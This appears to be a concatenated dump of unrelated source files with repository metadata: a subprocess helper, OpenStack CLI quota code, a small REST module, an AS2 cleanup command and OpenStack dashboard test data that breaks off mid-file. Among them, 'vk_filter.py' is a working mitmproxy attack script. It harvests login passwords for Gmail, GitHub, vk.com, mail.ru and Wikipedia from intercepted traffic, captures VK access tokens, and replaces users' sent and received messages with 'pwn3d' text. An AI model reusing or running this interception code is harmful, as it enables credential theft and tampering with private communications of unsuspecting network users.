""" wrapper for most of the subprocess calls
input:
cmdln_or_args: can be both args and cmdln str (shell=True)
return:
rc, output
"""
if isinstance(cmdln_or_args, list):
cmd = cmdln_or_args[0]
shell = False
else:
import shlex
cmd = shlex.split(cmdln_or_args)[0]
shell = True
sout = subprocess.PIPE
serr = subprocess.STDOUT
try:
process = subprocess.Popen(cmdln_or_args, stdout=sout,
stderr=serr, shell=shell)
sout, serr = process.communicate()
# combine stdout and stderr, filter None out and decode
out = ''.join([out.decode('utf-8') for out in [sout, serr] if out])
except OSError as err:
if err.errno == 2:
# [Errno 2] No such file or directory
raise WicError('Cannot run command: %s, lost dependency?' % cmd)
else:
raise # relay
return process.returncode, out
| gpl-2.0 | 1,398,075,700,761,582,800 | 33.115385 | 76 | 0.651635 | false |
infosec-216/alice | vk_filter.py | 1 | 12539 | import logging
import time
import cStringIO
from PIL import Image
from libmproxy.protocol.http import decoded
import re
import urllib # Russian messages support
from sets import Set
logging.basicConfig(filename="/root/mitm.log",level=logging.DEBUG)
class VK_user:
def __init__(self):
self.id = ""
self.peers = {}
self.messages = []
def __repr__(self):
s = "\n"
s += "User vk id = " + str(self.id) + "\n"
for peer in self.peers.keys():
s += "\tpeer " + peer + ": "
for hs in list(self.peers[peer]):
s += hs + " | "
s += "\n"
s += "\n"
s += "| toUser".ljust(20)+"| Topic".ljust(20)+"| Message".ljust(20)+'\n'
for m in self.messages:
s += str(m[1]).ljust(20) + str(m[2]).ljust(20) + str(m[0]).ljust(20) + "\n"
s += "\n"
return s
class VK_data:
def __init__(self):
self.users = {}
self.current_user = ""
# temp user to store data if we do not currently know the id
self.on_new_id("temp")
self.ips = {}
def from_a_typing(self, string):
m = re.match(r"act=a_typing&al=(?P<al>\d+)&gid=(?P<gid>\d+)&hash=(?P<hash>\w+)&peer=(?P<peer>\d+)", string)
if not m:
logging.debug("from_a_typing: Failed to parse " + string)
return [0]
logging.debug("Typing: al = " + m.group('al') + " gid = " + m.group('gid') +
" hash = " + m.group('hash') + " peer = " + m.group('peer'))
if m.group('peer') not in self.users[self.current_user].peers.keys():
self.users[self.current_user].peers[m.group('peer')] = Set([])
self.users[self.current_user].peers[m.group('peer')].add(m.group('hash'))
return [1]
def from_a_send(self, string):
m = re.match((r"act=a_send&al=(?P<al>\d+)&gid=(?P<gid>\d+)&guid" +
"=(?P<guid>\d+\.?\d*)&hash=(?P<hash>\w+)&media=(?P" +
"<media>\w*)&msg=(?P<msg>[\w\W]*)&title=(?P<title>\w*)" +
"&to=(?P<to>\d+)&ts=(?P<ts>\d+)"), string, re.UNICODE)
if not m:
logging.debug(string)
return [0, string]
# logging.debug("al = " + m.group('al'))
# logging.debug("gid = " + m.group('gid'))
# logging.debug("guid = " + m.group('guid'))
# logging.debug("hash = " + m.group('hash'))
# logging.debug("media = " + m.group('media'))
# logging.debug("msg = " + m.group('msg'))
# logging.debug("title = " + m.group('title'))
# logging.debug("to = " + m.group('to'))
# logging.debug("ts = " + m.group('ts'))
if m.group('to') not in self.users[self.current_user].peers.keys():
self.users[self.current_user].peers[m.group('to')] = Set([])
self.users[self.current_user].peers[m.group('to')].add(m.group('hash'))
self.users[self.current_user].messages.append([m.group('msg'), m.group('to'), m.group('hash')])
logging.debug(str(self.users[self.current_user]))
# Substitute message
string_ = ("act=a_send&al="+m.group('al')+"&gid="+m.group('gid')+"&guid="+
m.group('guid')+"&hash="+m.group('hash')+"&media="+m.group('media')+
"&msg="+"I have been pwn3d"+"&title="+m.group('title')+
"&to="+m.group('to')+"&ts="+m.group('ts'))
return [2, string_]
def from_a_check(self, string):
m_key = re.match(r"act=a_check&key=[\w\W]*", string, re.UNICODE)
m_id = re.match(r"act=a_check&id=(?P<id>\d+)&[\w\W]*", string, re.UNICODE)
if m_key:
return [1]
if m_id:
logging.debug("[a_check]: Found my id: " + m_id.group('id'))
self.on_new_id(m_id.group('id'))
return [1]
logging.debug(string)
return [0]
def decode_request(self, string):
try:
string = urllib.unquote(string).decode('utf-8')
except Exception as e:
logging.debug("Exception in 'decode_request':")
logging.debug(e)
m = re.match(r"act=(?P<type>\w+)&\w+", string)
if not m:
return [0]
if m.group('type') == "a_typing":
return self.from_a_typing(string)
if m.group('type') == "a_send":
return self.from_a_send(string)
if m.group('type') == "a_check":
return self.from_a_check(string)
# No-info types
if m.group('type') == "login":
return [1]
if m.group('type') == "pad":
return [1]
if m.group('type') == "a_friends":
return [1]
if m.group('type') == "a_onlines":
return [1]
if m.group('type') == "a_release":
return [1]
if m.group('type') == "a_get_fast_chat":
return [1]
# logging.debug("Unable to decode type " + m.group('type')
# + "! " + string)
return [0]
def decode_response(self, string):
m = re.match(r"\{\"ts\":(?P<num>\d+),\"updates\":(?P<lstring>[\w\W]+),\"(?P<msg>[\w\W]+)\",\{\}(?P<rstring>[\w\W]*)\}", string)
if not m:
return [0]
self.users[self.current_user].messages.append([m.group('msg'), str(self.users[self.current_user].id), "-"])
logging.debug(str(self.users[self.current_user]))
string_ = "{\"ts\":"+m.group('num')+",\"updates\":"+m.group('lstring')+",\""+"you have been pwn3d"+"\",{}"+m.group('rstring')+"}"
return [2, string_]
def applet_deauth(self, string, ip):
m = re.match(r"[\w\W]+&access_token=(?P<token>[\w\W]*)&v=(?P<v>\d+\.?\d*)", string)
if not m:
return [0]
if ip not in self.ips.keys():
logging.debug("NEW ENTRY; IP = " + str(ip))
self.ips[ip] = [False, m.group('token'), m.group('v')]
if (self.ips[ip][0]):
logging.debug("IP" + str(ip) + " is already processed")
return [1]
return [2, "error=1"]
string_ = ("code=return{offline:API.account.setOffline({}),};&lang=ru&access_token=" +
m.group('token') +"&v=" + m.group('v'))
logging.debug("\nSENDING: " + string_ + "\n")
return [2, string_]
def decode_java(self, string):
try:
string = urllib.unquote(string).decode('utf-8')
except Exception as e:
# logging.debug("Exception in 'decode_java':")
# logging.debug(e)
pass
m = re.match((r"code=var mid = API.messages.send\(\{\"peer_id\":(?P<to>\d+),\"message\":\"(?P<msg>[\w\W]*)\"," +
"\"type\":\"(?P<type>[\w\W]*)\",\"guid\":(?P<guid>\d+),\"attachment\":(?P<att>[\w\W]*)"), string)
#logging.debug(str(string))
if not m:
return [0]
string_ = ("code=var mid = API.messages.send({\"peer_id\":" + m.group('to') + ",\"message\":\"i have been pwn3d\"," +
"\"type\":\"" + m.group('type') + "\",\"guid\":" + m.group('guid') + ",\"attachment\":" + m.group('att'))
return [2, string_]
def on_new_id(self, my_id):
if my_id not in self.users.keys():
self.users[my_id] = VK_user()
self.users[my_id].id = my_id
if (self.current_user == "temp") and (my_id != "temp"):
self.users[my_id] = self.users["temp"]
self.users[my_id].id = my_id
self.users["temp"] = VK_user()
self.current_user = my_id
# logging.debug("Known my_ids: " + str(self.users.keys()))
# logging.debug("Current my_id: " + str(self.current_user))
class PW_data:
def __init__(self):
self.passwords = []
def sniff_passwords(self, string, ip, vk_data):
if ("assword" not in string) and ("asswd" not in string) and ("pass" not in string) and ("Pass" not in string):
return
# logging.debug("STR: " + str(string))
try:
string = urllib.unquote(string).decode('utf-8')
except Exception as e:
# logging.debug("Exception in 'sniff_passwords':")
# logging.debug(e)
return
# Wiki
m = re.match(r"wpName=(?P<login>[^&]*)&wpPassword=(?P<password>[^&]*)&[\w\W]*", string)
if (m):
self.passwords.append([ip, "wikipedia.org", m.group('login'), m.group('password')])
logging.debug(str(self))
return
# Mail.ru
m = re.match(r"Login=(?P<login>[^&]*)&Domain=(?P<domain>[^&]*)&Password=(?P<password>[^&]*)&[\w\W]*", string)
if (m):
self.passwords.append([ip, "mail.ru", m.group('login')+'@'+m.group('domain'), m.group('password')])
logging.debug(str(self))
return
# Github
m = re.match(r"[\w\W]*&login=(?P<login>[^&]*)&password=(?P<password>[^&]*)[\w\W]*", string)
if (m):
self.passwords.append([ip, "github.com", m.group('login'), m.group('password')])
logging.debug(str(self))
return
# Gmail
m = re.match(r"[\w\W]*&Email=(?P<login>[^&]*)&Passwd=(?P<password>[^&]*)&[\w\W]*", string)
if (m):
self.passwords.append([ip, "gmail.com", m.group('login'), m.group('password')])
logging.debug(str(self))
return
# vk.com
m = re.match(r"act=login&[\w\W]*&email=(?P<login>[^&]*)&pass=(?P<password>[^&]*)", string)
if (m):
self.passwords.append([ip, "vk.com", m.group('login'), m.group('password')])
logging.debug(str(self))
return
# vk.com mobile
m = re.match(r"password=(?P<password>[^&]*)&[\w\W]*&username=(?P<login>[^&]*)&[\w\W]*&client_secret=(?P<secret>[^&]*)&client_id=(?P<id>\d+)", string)
if (m):
self.passwords.append([ip, "vk.com (mobile)", m.group('login'), m.group('password')])
logging.debug(str(self))
if ip not in vk_data.ips.keys():
vk_data.ips[ip] = [True, "", ""]
vk_data.ips[ip][0] = True
logging.debug("UNLOCKED IP = " + str(ip))
return
# Other websites
self.passwords.append([ip, string])
logging.debug(str(self))
def __repr__(self):
s = '\n'
s += "user".ljust(30) + "website".ljust(30) + "login".ljust(30) + "password".ljust(20) + '\n'
for entry in self.passwords:
if (len(entry) == 4):
s += entry[0].ljust(30)+entry[1].ljust(30)+entry[2].ljust(30)+entry[3].ljust(20) + '\n'
else:
s += entry[0].ljust(30)+entry[1] + '\n'
s += '\n'
return s
vk_db = VK_data()
pw_db = PW_data()
def request(context, flow):
try:
with decoded(flow.request): # automatically decode gzipped responses.
sourse_ip = str(flow.client_conn.address).split("'")[1]
dest_ip = str(flow.request.host)
#logging.debug("Sending (" + sourse_ip + " -> " + dest_ip + ")")
pw_db.sniff_passwords(str(flow.request.content), sourse_ip, vk_db)
# Regular vk
result = vk_db.decode_request(str(flow.request.content))
if (result[0] == 2):
flow.request.content = result[1]
# vk App deauth
result = vk_db.applet_deauth(str(flow.request.content), sourse_ip)
if (result[0] == 2):
flow.request.content = result[1]
# vk mobile App
result = vk_db.decode_java(str(flow.request.content))
if (result[0] == 2):
flow.request.content = result[1]
except Exception as e:
# logging.debug("Exception in 'request':")
# logging.debug(e)
pass
def response(context, flow):
try:
with decoded(flow.response): # automatically decode gzipped responses.
result = vk_db.decode_response(str(flow.response.content))
if (result[0] == 2):
flow.response.content = result[1]
except Exception as e:
# logging.debug("Exception in 'response':")
# logging.debug(e)
pass
def start (context, argv):
logging.debug("============================================\n")
logging.debug(time.time())
logging.debug("Startup:\n")
context.log("start")
| mit | -4,966,170,004,822,145,000 | 34.622159 | 157 | 0.490709 | false |
sjsucohort6/openstack | python/venv/lib/python2.7/site-packages/openstackclient/common/quota.py | 1 | 7859 | # Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""Quota action implementations"""
import itertools
import logging
import six
import sys
from cliff import command
from cliff import show
from openstackclient.common import utils
# List the quota items, map the internal argument name to the option
# name that the user sees.
COMPUTE_QUOTAS = {
'cores': 'cores',
'fixed_ips': 'fixed-ips',
'floating_ips': 'floating-ips',
'injected_file_content_bytes': 'injected-file-size',
'injected_file_path_bytes': 'injected-path-size',
'injected_files': 'injected-files',
'instances': 'instances',
'key_pairs': 'key-pairs',
'metadata_items': 'properties',
'ram': 'ram',
'security_group_rules': 'secgroup-rules',
'security_groups': 'secgroups',
}
VOLUME_QUOTAS = {
'gigabytes': 'gigabytes',
'snapshots': 'snapshots',
'volumes': 'volumes',
}
NETWORK_QUOTAS = {
'floatingip': 'floating-ips',
'security_group_rule': 'secgroup-rules',
'security_group': 'secgroups',
}
class SetQuota(command.Command):
"""Set quotas for project or class"""
log = logging.getLogger(__name__ + '.SetQuota')
def get_parser(self, prog_name):
parser = super(SetQuota, self).get_parser(prog_name)
parser.add_argument(
'project',
metavar='<project/class>',
help='Set quotas for this project or class (name/ID)',
)
parser.add_argument(
'--class',
dest='quota_class',
action='store_true',
default=False,
help='Set quotas for <class>',
)
for k, v in itertools.chain(
COMPUTE_QUOTAS.items(), VOLUME_QUOTAS.items()):
parser.add_argument(
'--%s' % v,
metavar='<%s>' % v,
type=int,
help='New value for the %s quota' % v,
)
parser.add_argument(
'--volume-type',
metavar='<volume-type>',
help='Set quotas for a specific <volume-type>',
)
return parser
@utils.log_method(log)
def take_action(self, parsed_args):
compute_client = self.app.client_manager.compute
volume_client = self.app.client_manager.volume
compute_kwargs = {}
for k, v in COMPUTE_QUOTAS.items():
value = getattr(parsed_args, k, None)
if value is not None:
compute_kwargs[k] = value
volume_kwargs = {}
for k, v in VOLUME_QUOTAS.items():
value = getattr(parsed_args, k, None)
if value is not None:
if parsed_args.volume_type:
k = k + '_%s' % parsed_args.volume_type
volume_kwargs[k] = value
if compute_kwargs == {} and volume_kwargs == {}:
sys.stderr.write("No quotas updated")
return
if parsed_args.quota_class:
if compute_kwargs:
compute_client.quota_classes.update(
parsed_args.project,
**compute_kwargs)
if volume_kwargs:
volume_client.quota_classes.update(
parsed_args.project,
**volume_kwargs)
else:
if compute_kwargs:
compute_client.quotas.update(
parsed_args.project,
**compute_kwargs)
if volume_kwargs:
volume_client.quotas.update(
parsed_args.project,
**volume_kwargs)
class ShowQuota(show.ShowOne):
"""Show quotas for project or class"""
log = logging.getLogger(__name__ + '.ShowQuota')
def get_parser(self, prog_name):
parser = super(ShowQuota, self).get_parser(prog_name)
parser.add_argument(
'project',
metavar='<project/class>',
help='Show this project or class (name/ID)',
)
type_group = parser.add_mutually_exclusive_group()
type_group.add_argument(
'--class',
dest='quota_class',
action='store_true',
default=False,
help='Show quotas for <class>',
)
type_group.add_argument(
'--default',
dest='default',
action='store_true',
default=False,
help='Show default quotas for <project>'
)
return parser
def get_compute_volume_quota(self, client, parsed_args):
try:
if parsed_args.quota_class:
quota = client.quota_classes.get(parsed_args.project)
elif parsed_args.default:
quota = client.quotas.defaults(parsed_args.project)
else:
quota = client.quotas.get(parsed_args.project)
except Exception as e:
if type(e).__name__ == 'EndpointNotFound':
return {}
else:
raise e
return quota._info
def get_network_quota(self, parsed_args):
if parsed_args.quota_class or parsed_args.default:
return {}
service_catalog = self.app.client_manager.auth_ref.service_catalog
if 'network' in service_catalog.get_endpoints():
network_client = self.app.client_manager.network
return network_client.show_quota(parsed_args.project)['quota']
else:
return {}
@utils.log_method(log)
def take_action(self, parsed_args):
compute_client = self.app.client_manager.compute
volume_client = self.app.client_manager.volume
# NOTE(dtroyer): These quota API calls do not validate the project
# or class arguments and return what appears to be
# the default quota values if the project or class
# does not exist. If this is determined to be the
# intended behaviour of the API we will validate
# the argument with Identity ourselves later.
compute_quota_info = self.get_compute_volume_quota(compute_client,
parsed_args)
volume_quota_info = self.get_compute_volume_quota(volume_client,
parsed_args)
network_quota_info = self.get_network_quota(parsed_args)
info = {}
info.update(compute_quota_info)
info.update(volume_quota_info)
info.update(network_quota_info)
# Map the internal quota names to the external ones
# COMPUTE_QUOTAS and NETWORK_QUOTAS share floating-ips,
# secgroup-rules and secgroups as dict value, so when
# neutron is enabled, quotas of these three resources
# in nova will be replaced by neutron's.
for k, v in itertools.chain(
COMPUTE_QUOTAS.items(), VOLUME_QUOTAS.items(),
NETWORK_QUOTAS.items()):
if not k == v and info.get(k):
info[v] = info[k]
info.pop(k)
# Handle project ID special as it only appears in output
if 'id' in info:
info['project'] = info.pop('id')
return zip(*sorted(six.iteritems(info)))
| mit | -5,707,946,925,653,465,000 | 33.169565 | 77 | 0.56254 | false |
marcosxddh/aula_script | backend/appengine/routes/books/rest.py | 1 | 1044 | # -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from gaebusiness.business import CommandExecutionException
from tekton.gae.middleware.json_middleware import JsonResponse
from book_app import facade
def index():
cmd = facade.list_books_cmd()
book_list = cmd()
short_form=facade.book_short_form()
book_short = [short_form.fill_with_model(m) for m in book_list]
return JsonResponse(book_short)
def save(**book_properties):
cmd = facade.save_book_cmd(**book_properties)
return _save_or_update_json_response(cmd)
def update(book_id, **book_properties):
cmd = facade.update_book_cmd(book_id, **book_properties)
return _save_or_update_json_response(cmd)
def delete(book_id):
facade.delete_book_cmd(book_id)()
def _save_or_update_json_response(cmd):
try:
book = cmd()
except CommandExecutionException:
return JsonResponse({'errors': cmd.errors})
short_form=facade.book_short_form()
return JsonResponse(short_form.fill_with_model(book))
| mit | 2,769,724,432,939,574,300 | 27.216216 | 67 | 0.704981 | false |
abhishek-ram/pyas2 | pyas2/management/commands/cleanas2server.py | 1 | 3094 | from django.core.management.base import BaseCommand
from django.utils.translation import ugettext as _
from datetime import timedelta
from django.utils import timezone
from pyas2 import models
from pyas2 import pyas2init
import os
import glob
class Command(BaseCommand):
help = _(u'Automatic maintenance for the AS2 server. '
u'Cleans up all the old logs, messages and archived files.')
def handle(self, *args, **options):
pyas2init.logger.info(_(u'Automatic maintenance process started'))
max_archive_dt = timezone.now() - timedelta(
pyas2init.gsettings['max_arch_days'])
max_archive_ts = int(max_archive_dt.strftime("%s"))
pyas2init.logger.info(
_(u'Delete all DB Objects older than max archive days'))
old_message = models.Message.objects.filter(
timestamp__lt=max_archive_dt).order_by('timestamp')
for message in old_message:
pyas2init.logger.debug(
_(u'Delete Message {} and all related '
u'objects'.format(message)))
if message.payload:
message.payload.delete()
if message.mdn:
message.mdn.delete()
message.delete()
pyas2init.logger.info(
_(u'Delete all logs older than max archive days'))
log_folder = os.path.join(pyas2init.gsettings['log_dir'], 'pyas2*')
for logfile in glob.iglob(log_folder):
filename = os.path.join(
pyas2init.gsettings['log_dir'], logfile)
if os.path.getmtime(filename) < max_archive_ts:
pyas2init.logger.debug(
_(u'Delete Log file {}'.format(filename)))
os.remove(filename)
pyas2init.logger.info(
_(u'Delete all Archive Files older than max archive days'))
archive_folders = [
pyas2init.gsettings['payload_send_store'],
pyas2init.gsettings['payload_receive_store'],
pyas2init.gsettings['mdn_send_store'],
pyas2init.gsettings['mdn_receive_store']
]
for archive_folder in archive_folders:
for (dir_path, dir_names, arch_files) in os.walk(archive_folder):
if len(arch_files) > 0:
for arch_file in arch_files:
filename = os.path.join(dir_path, arch_file)
if os.path.getmtime(filename) < max_archive_ts:
pyas2init.logger.debug(_(u'Delete Archive file '
u'{}'.format(filename)))
os.remove(filename)
# Delete the folder if it is empty
try:
os.rmdir(dir_path)
pyas2init.logger.debug(_(u'Delete Empty Archive folder'
u' {}'.format(dir_path)))
except OSError:
pass
pyas2init.logger.info(_(u'Automatic maintenance process completed'))
| gpl-2.0 | 1,272,911,551,532,576,500 | 42.577465 | 79 | 0.555268 | false |
tuskar/tuskar-ui | openstack_dashboard/test/test_data/nova_data.py | 1 | 22432 | # Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
import uuid
from novaclient.v1_1 import aggregates
from novaclient.v1_1 import availability_zones
from novaclient.v1_1 import certs
from novaclient.v1_1 import flavors
from novaclient.v1_1 import floating_ips
from novaclient.v1_1 import hypervisors
from novaclient.v1_1 import keypairs
from novaclient.v1_1 import quotas
from novaclient.v1_1 import security_group_rules as rules
from novaclient.v1_1 import security_groups as sec_groups
from novaclient.v1_1 import servers
from novaclient.v1_1 import services
from novaclient.v1_1 import usage
from novaclient.v1_1 import volume_snapshots as vol_snaps
from novaclient.v1_1 import volume_types
from novaclient.v1_1 import volumes
from openstack_dashboard.api.base import Quota
from openstack_dashboard.api.base import QuotaSet as QuotaSetWrapper
from openstack_dashboard.api.nova import FloatingIp as NetFloatingIp
from openstack_dashboard.usage.quotas import QuotaUsage
from openstack_dashboard.test.test_data.utils import TestDataContainer
SERVER_DATA = """
{
"server": {
"OS-EXT-SRV-ATTR:instance_name": "instance-00000005",
"OS-EXT-SRV-ATTR:host": "instance-host",
"OS-EXT-STS:task_state": null,
"addresses": {
"private": [
{
"version": 4,
"addr": "10.0.0.1"
}
]
},
"links": [
{
"href": "%(host)s/v1.1/%(tenant_id)s/servers/%(server_id)s",
"rel": "self"
},
{
"href": "%(host)s/%(tenant_id)s/servers/%(server_id)s",
"rel": "bookmark"
}
],
"image": {
"id": "%(image_id)s",
"links": [
{
"href": "%(host)s/%(tenant_id)s/images/%(image_id)s",
"rel": "bookmark"
}
]
},
"OS-EXT-STS:vm_state": "active",
"flavor": {
"id": "%(flavor_id)s",
"links": [
{
"href": "%(host)s/%(tenant_id)s/flavors/%(flavor_id)s",
"rel": "bookmark"
}
]
},
"id": "%(server_id)s",
"user_id": "%(user_id)s",
"OS-DCF:diskConfig": "MANUAL",
"accessIPv4": "",
"accessIPv6": "",
"progress": null,
"OS-EXT-STS:power_state": 1,
"config_drive": "",
"status": "%(status)s",
"updated": "2012-02-28T19:51:27Z",
"hostId": "c461ea283faa0ab5d777073c93b126c68139e4e45934d4fc37e403c2",
"key_name": "%(key_name)s",
"name": "%(name)s",
"created": "2012-02-28T19:51:17Z",
"tenant_id": "%(tenant_id)s",
"metadata": {"someMetaLabel": "someMetaData",
"some<b>html</b>label": "<!--",
"empty": ""}
}
}
"""
USAGE_DATA = """
{
"total_memory_mb_usage": 64246.89777777778,
"total_vcpus_usage": 125.48222222222223,
"total_hours": 125.48222222222223,
"total_local_gb_usage": 0,
"tenant_id": "%(tenant_id)s",
"stop": "2012-01-31 23:59:59",
"start": "2012-01-01 00:00:00",
"server_usages": [
{
"memory_mb": %(flavor_ram)s,
"uptime": 442321,
"started_at": "2012-01-26 20:38:21",
"ended_at": null,
"name": "%(instance_name)s",
"tenant_id": "%(tenant_id)s",
"state": "active",
"hours": 122.87361111111112,
"vcpus": %(flavor_vcpus)s,
"flavor": "%(flavor_name)s",
"local_gb": %(flavor_disk)s
},
{
"memory_mb": %(flavor_ram)s,
"uptime": 9367,
"started_at": "2012-01-31 20:54:15",
"ended_at": null,
"name": "%(instance_name)s",
"tenant_id": "%(tenant_id)s",
"state": "active",
"hours": 2.608611111111111,
"vcpus": %(flavor_vcpus)s,
"flavor": "%(flavor_name)s",
"local_gb": %(flavor_disk)s
}
]
}
"""
def data(TEST):
TEST.servers = TestDataContainer()
TEST.flavors = TestDataContainer()
TEST.keypairs = TestDataContainer()
TEST.security_groups = TestDataContainer()
TEST.security_groups_uuid = TestDataContainer()
TEST.security_group_rules = TestDataContainer()
TEST.security_group_rules_uuid = TestDataContainer()
TEST.volumes = TestDataContainer()
TEST.quotas = TestDataContainer()
TEST.quota_usages = TestDataContainer()
TEST.floating_ips = TestDataContainer()
TEST.floating_ips_uuid = TestDataContainer()
TEST.usages = TestDataContainer()
TEST.certs = TestDataContainer()
TEST.volume_snapshots = TestDataContainer()
TEST.volume_types = TestDataContainer()
TEST.availability_zones = TestDataContainer()
TEST.hypervisors = TestDataContainer()
TEST.services = TestDataContainer()
TEST.aggregates = TestDataContainer()
# Data return by novaclient.
# It is used if API layer does data conversion.
TEST.api_floating_ips = TestDataContainer()
TEST.api_floating_ips_uuid = TestDataContainer()
# Volumes
volume = volumes.Volume(volumes.VolumeManager(None),
dict(id="41023e92-8008-4c8b-8059-7f2293ff3775",
name='test_volume',
status='available',
size=40,
display_name='Volume name',
created_at='2012-04-01 10:30:00',
volume_type=None,
attachments=[]))
nameless_volume = volumes.Volume(volumes.VolumeManager(None),
dict(id="3b189ac8-9166-ac7f-90c9-16c8bf9e01ac",
name='',
status='in-use',
size=10,
display_name='',
display_description='',
device="/dev/hda",
created_at='2010-11-21 18:34:25',
volume_type='vol_type_1',
attachments=[{"id": "1", "server_id": '1',
"device": "/dev/hda"}]))
attached_volume = volumes.Volume(volumes.VolumeManager(None),
dict(id="8cba67c1-2741-6c79-5ab6-9c2bf8c96ab0",
name='my_volume',
status='in-use',
size=30,
display_name='My Volume',
display_description='',
device="/dev/hdk",
created_at='2011-05-01 11:54:33',
volume_type='vol_type_2',
attachments=[{"id": "2", "server_id": '1',
"device": "/dev/hdk"}]))
TEST.volumes.add(volume)
TEST.volumes.add(nameless_volume)
TEST.volumes.add(attached_volume)
vol_type1 = volume_types.VolumeType(volume_types.VolumeTypeManager(None),
{'id': 1,
'name': 'vol_type_1'})
vol_type2 = volume_types.VolumeType(volume_types.VolumeTypeManager(None),
{'id': 2,
'name': 'vol_type_2'})
TEST.volume_types.add(vol_type1, vol_type2)
# Flavors
flavor_1 = flavors.Flavor(flavors.FlavorManager(None),
{'id': "aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa",
'name': 'm1.tiny',
'vcpus': 1,
'disk': 0,
'ram': 512,
'swap': 0,
'extra_specs': {},
'OS-FLV-EXT-DATA:ephemeral': 0})
flavor_2 = flavors.Flavor(flavors.FlavorManager(None),
{'id': "bbbbbbbb-bbbb-bbbb-bbbb-bbbbbbbbbbbb",
'name': 'm1.massive',
'vcpus': 1000,
'disk': 1024,
'ram': 10000,
'swap': 0,
'extra_specs': {'Trusted': True, 'foo': 'bar'},
'OS-FLV-EXT-DATA:ephemeral': 2048})
TEST.flavors.add(flavor_1, flavor_2)
# Keypairs
keypair = keypairs.Keypair(keypairs.KeypairManager(None),
dict(name='keyName'))
TEST.keypairs.add(keypair)
# Security Groups and Rules
def generate_security_groups(is_uuid=False):
def get_id(is_uuid):
global current_int_id
if is_uuid:
return str(uuid.uuid4())
else:
get_id.current_int_id += 1
return get_id.current_int_id
get_id.current_int_id = 0
sg_manager = sec_groups.SecurityGroupManager(None)
rule_manager = rules.SecurityGroupRuleManager(None)
sec_group_1 = sec_groups.SecurityGroup(sg_manager,
{"rules": [],
"tenant_id": TEST.tenant.id,
"id": get_id(is_uuid),
"name": u"default",
"description": u"default"})
sec_group_2 = sec_groups.SecurityGroup(sg_manager,
{"rules": [],
"tenant_id": TEST.tenant.id,
"id": get_id(is_uuid),
"name": u"other_group",
"description": u"NotDefault."})
sec_group_3 = sec_groups.SecurityGroup(sg_manager,
{"rules": [],
"tenant_id": TEST.tenant.id,
"id": get_id(is_uuid),
"name": u"another_group",
"description": u"NotDefault."})
rule = {'id': get_id(is_uuid),
'group': {},
'ip_protocol': u"tcp",
'from_port': u"80",
'to_port': u"80",
'parent_group_id': sec_group_1.id,
'ip_range': {'cidr': u"0.0.0.0/32"}}
icmp_rule = {'id': get_id(is_uuid),
'group': {},
'ip_protocol': u"icmp",
'from_port': u"9",
'to_port': u"5",
'parent_group_id': sec_group_1.id,
'ip_range': {'cidr': u"0.0.0.0/32"}}
group_rule = {'id': 3,
'group': {},
'ip_protocol': u"tcp",
'from_port': u"80",
'to_port': u"80",
'parent_group_id': sec_group_1.id,
'source_group_id': sec_group_1.id}
rule_obj = rules.SecurityGroupRule(rule_manager, rule)
rule_obj2 = rules.SecurityGroupRule(rule_manager, icmp_rule)
rule_obj3 = rules.SecurityGroupRule(rule_manager, group_rule)
sec_group_1.rules = [rule_obj]
sec_group_2.rules = [rule_obj]
return {"rules": [rule_obj, rule_obj2, rule_obj3],
"groups": [sec_group_1, sec_group_2, sec_group_3]}
sg_data = generate_security_groups()
TEST.security_group_rules.add(*sg_data["rules"])
TEST.security_groups.add(*sg_data["groups"])
sg_uuid_data = generate_security_groups(is_uuid=True)
TEST.security_group_rules_uuid.add(*sg_uuid_data["rules"])
TEST.security_groups_uuid.add(*sg_uuid_data["groups"])
# Quota Sets
quota_data = dict(metadata_items='1',
injected_file_content_bytes='1',
volumes='1',
gigabytes='1000',
ram=10000,
floating_ips='1',
fixed_ips='10',
instances='10',
injected_files='1',
cores='10',
security_groups='10',
security_group_rules='20')
quota = quotas.QuotaSet(quotas.QuotaSetManager(None), quota_data)
TEST.quotas.nova = QuotaSetWrapper(quota)
TEST.quotas.add(QuotaSetWrapper(quota))
# Quota Usages
quota_usage_data = {'gigabytes': {'used': 0,
'quota': 1000},
'instances': {'used': 0,
'quota': 10},
'ram': {'used': 0,
'quota': 10000},
'cores': {'used': 0,
'quota': 20}}
quota_usage = QuotaUsage()
for k, v in quota_usage_data.items():
quota_usage.add_quota(Quota(k, v['quota']))
quota_usage.tally(k, v['used'])
TEST.quota_usages.add(quota_usage)
# Limits
limits = {"absolute": {"maxImageMeta": 128,
"maxPersonality": 5,
"maxPersonalitySize": 10240,
"maxSecurityGroupRules": 20,
"maxSecurityGroups": 10,
"maxServerMeta": 128,
"maxTotalCores": 20,
"maxTotalFloatingIps": 10,
"maxTotalInstances": 10,
"maxTotalKeypairs": 100,
"maxTotalRAMSize": 10000,
"totalCoresUsed": 0,
"totalInstancesUsed": 0,
"totalKeyPairsUsed": 0,
"totalRAMUsed": 0,
"totalSecurityGroupsUsed": 0}}
TEST.limits = limits
# Servers
tenant3 = TEST.tenants.list()[2]
vals = {"host": "http://nova.example.com:8774",
"name": "server_1",
"status": "ACTIVE",
"tenant_id": TEST.tenants.first().id,
"user_id": TEST.user.id,
"server_id": "1",
"flavor_id": flavor_1.id,
"image_id": TEST.images.first().id,
"key_name": keypair.name}
server_1 = servers.Server(servers.ServerManager(None),
json.loads(SERVER_DATA % vals)['server'])
vals.update({"name": "server_2",
"status": "BUILD",
"server_id": "2"})
server_2 = servers.Server(servers.ServerManager(None),
json.loads(SERVER_DATA % vals)['server'])
vals.update({"name": u'\u4e91\u89c4\u5219',
"status": "ACTIVE",
"tenant_id": tenant3.id,
"server_id": "3"})
server_3 = servers.Server(servers.ServerManager(None),
json.loads(SERVER_DATA % vals)['server'])
TEST.servers.add(server_1, server_2, server_3)
# VNC Console Data
